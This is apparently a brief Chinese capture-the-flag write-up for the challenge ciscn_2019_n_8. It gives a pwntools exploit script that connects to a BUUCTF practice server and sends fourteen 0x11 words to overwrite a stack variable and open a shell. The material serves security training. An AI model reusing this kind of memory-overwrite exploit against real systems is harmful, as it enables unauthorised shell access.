ciscn_2019_n_8
查看保护
只要var[13]变成了0x11就可以getshell了。所以只需要覆盖14个0x11。
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 27475)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
p1 = p32(0x11) * 14
r.sendline(p1)
r.interactive()